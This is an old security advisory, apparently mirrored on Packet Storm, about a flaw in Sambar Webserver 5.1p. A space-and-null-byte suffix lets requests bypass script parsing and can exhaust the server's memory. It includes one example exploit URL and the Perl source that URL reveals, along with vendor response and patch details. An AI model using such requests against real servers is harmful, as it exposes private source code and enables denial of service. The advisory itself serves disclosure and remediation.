what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

sambar.fileparse.txt

sambar.fileparse.txt
Posted Apr 23, 2002
Authored by Peter Grundl

The Sambar Webserver v5.1p on Windows 2000 contains a flaw in the serverside URL parsing that allows malicious users to bypass serverside fileparsing and display the sourcecode of scripts. The same flaw could allow a malicious user to crash the web service. Example URL's included. Fix available here.

tags | web
systems | windows
SHA-256 | 7bff33cd3a2c799145ed9e3a6b0e19f2ba86cc4529efcc24ac878157fb592ca0

sambar.fileparse.txt

Change Mirror Download
--------------------------------------------------------------------

-=>Sambar Webserver Serverside Fileparse Bypass<=-
courtesy of KPMG Denmark

BUG-ID: 2002012
Released: 17th Apr 2002
Re-submitted: 18th apr 2002
--------------------------------------------------------------------
Cause for re-submission:
========================
It would appear that I am in need of glasses. The patch URL in the
original advisory was misspelled, and this advisory is re-submitted
to make sure people that are interested in the patch can obtain it.


Problem:
========
A flaw in the serverside URL parsing could allow a malicious user to
bypass serverside fileparsing and display the sourcecode of scripts.
The same flaw could allow a malicious user to crash the web service.


Vulnerable:
===========
- Sambar Webserver V5.1p on Windows 2000
- Other versions were not tested.


Details:
========
It is possible to bypass the serverside parsing of scripts, such as
.pl, .jsp, .asp, .stm and download the sourcecode. The bypassing also
opens up for a request to certain DOS-devices that the server would
then attempt to access. These ressources used in such requests are
not freed properly and as a result, the web server will eventually
run out of memory and the operating system will kill the web
service.

To bypass the serverside parsing, an attacker would have to access
the ressource with a suffix of <space><null>. There are a lot of
ways to achieve this in eg. Internet Explorer, and an example of
sourcecode exposure could be:

https://server/cgi-bin/environ.pl+%00

which would return the following (perl sourcecode):

read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});
print< GATEWAY_INTERFACE: $ENV{'GATEWAY_INTERFACE'}
PATH_INFO: $ENV{'PATH_INFO'}
PATH_TRANSLATED: $ENV{'PATH_TRANSLATED'}
QUERY_STRING: $ENV{'QUERY_STRING'}
REMOTE_ADDR: $ENV{'REMOTE_ADDR'}
REMOTE_HOST: $ENV{'REMOTE_HOST'}
REMOTE_USER: $ENV{'REMOTE_USER'}
REQUEST_METHOD: $ENV{'REQUEST_METHOD'}
DOCUMENT_NAME: $ENV{'DOCUMENT_NAME'}
DOCUMENT_URI: $ENV{'DOCUMENT_URI'}
SCRIPT_NAME: $ENV{'SCRIPT_NAME'}
SCRIPT_FILENAME: $ENV{'SCRIPT_FILENAME'}
SERVER_NAME: $ENV{'SERVER_NAME'}
SERVER_PORT: $ENV{'SERVER_PORT'}
SERVER_PROTOCOL: $ENV{'SERVER_PROTOCOL'}
SERVER_SOFTWARE: $ENV{'SERVER_SOFTWARE'}
CONTENT_LENGTH: $ENV{'CONTENT_LENGTH'}
CONTENT: $CONTENT
END


Vendor URL:
===========
You can visit the vendors webpage here: https://www.sambar.com


Vendor response:
================
The vendor was contacted 3rd of April, 2002. The vendor confirmed the
bug on the same day, and notified us that a patch was being developed.
On the 17th of April, the vendor released a new version that corrects
the issues.


Corrective action:
==================
The vendor has released Version 5.2b, which is available here:
https://sambar.dnsalias.org/win32-preview.tar.gz


Author: Peter Gründl (pgrundl@kpmg.dk)

--------------------------------------------------------------------
KPMG is not responsible for the misuse of the information we provide
through our security advisories. These advisories are a service to
the professional security community. In no event shall KPMG be lia-
ble for any consequences whatsoever arising out of or in connection
with the use or spread of this information.
--------------------------------------------------------------------

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close